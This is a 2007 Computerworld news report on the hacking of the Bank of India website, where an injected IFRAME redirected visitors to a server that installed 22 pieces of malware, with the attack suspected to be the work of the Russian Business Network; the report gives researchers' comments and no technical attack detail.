Bank of India site hacked, serves up 22 exploits
Reminiscent of Super Bowl site hack in January; notorious Russian gang suspected
Computerworld - The Bank of India Web site was hacked sometime Wednesday night (U.S. time) and seeded with a wide, wild array of malware that infected any users running unpatched browsers, security researchers said today.
Although the bank's site had been scoured of all malware by Friday morning, it's currently offline. "This site is under temporary maintenance and will be available after 09:00 IST on 1.09.07," a prominent message currently reads.
Researchers at Sunbelt Software Inc. first posted details of the hack yesterday afternoon after finding rogue code embedded in the site's HTML. That code, actually an IFRAME exploit, silently redirected users to a hacker server, which pushed 22 different pieces of malware onto vulnerable PCs. By Sunbelt's tally, the malware included one worm, three rootkits, five Trojan downloaders, and several password stealers. "The biggest issue is the sheer volume of malware we've had to analyze," said Alex Eckelberry, Sunbelt's CEO, in a blog posting yesterday.
Other researchers dug up more information. According to Roger Thompson, the chief technology officer of Exploit Prevention Labs Inc., the bank's site was compromised sometime between late Wednesday and early Thursday (U.S. time). How it was hacked, however, is yet unknown, as is how many bank customers might have been infected by the attacks.
When contacted Friday, executives and IT administrators at U.S. offices of Bank of India were unaware of the hack. Later, after reaching his colleagues in India, a U.S.-based spokesman said only: "They are aware of the problem. Bank IT and security people are working on this now." He had no other information on the severity of the attack or its duration, however.
For his part, Thompson posted a video of the hack (.wmv file download) that showed the massive infections and resulting system changes in a debugger window. At one point, he pointed out a couple of pop-ups that appeared during the infection. "The pop-ups aren't the problem, the problem is that you're already hosed if you're not patched," he said. "You're comprehensively owned at this point."
By 10:30 a.m. Eastern, the site was clean, Eckelberry reported.
All clues point to the notorious Russian Business Network (RBN) gang, said Eckelberry. Based in St. Petersburg, RBN has been dubbed "the baddest of the bad" by VeriSign iDefense, and is reportedly involved in everything from spamming and phishing to denial-of-service attacks and selling child pornography over the Internet.
"There has been speculation as to whether the malware was installed through an exploit framework -- Webattacker, Mpack, Icepack -- as it was encrypted in the same way as Webattacker," said Eckelberry.
Thompson confirmed the breach. In a blog of his own, Thompson said it looked like the "standard Mpack/Icepack stuff" to him.
The Bank of India hack is only the latest example of a legitimate Web site behing compromised, and serving up malware to unwary visitors. In the U.S., the most serious incident was earlier this year, when the site belong to Dolphin Stadium, host to the National Football League's Super Bowl, was hacked just days before the big game.
Read more about Security in Computerworld's Security Topic Center.
- Troubleshooting Common Issues in VoIP Learn more about Voice over Internet Protocol (VoIP), including common VoIP metrics used, best practices in VoIP management and tips and tricks for...
- 2013 Network Management Software (NMS) Buyers Guide This white paper contains an independent comparison study of six different network management solutions and provides guidance on how you can choose the...
- Rightsizing Your Network Performance Management Solution: 4 Case Studies This white paper discusses challenges encountered as organizations search for the most cost-effective network performance management solution.
- Global Growing Pains: Tapping into B2B Integration Services to Overcome Global Expansion Challenges A recent survey by IDG Research explored both the challenges and pain points companies face when growing globally, as well as the capabilities...
- E-Signature RFP Checklist Webcast If your organization is looking to adopt e-signatures, you may be overwhelmed by the number of providers that offer seemingly similar solutions. How...
- Cloud and Collaboration: Driving Your Business Value Mission Critical Cloud from Peer 1 Hosting is enterprise-grade. All Security White Papers | Webcasts
Our new bimonthly Internet of Things newsletter helps you keep pace with the rapidly evolving technologies, trends and developments related to the IoT. Subscribe now and stay up to date!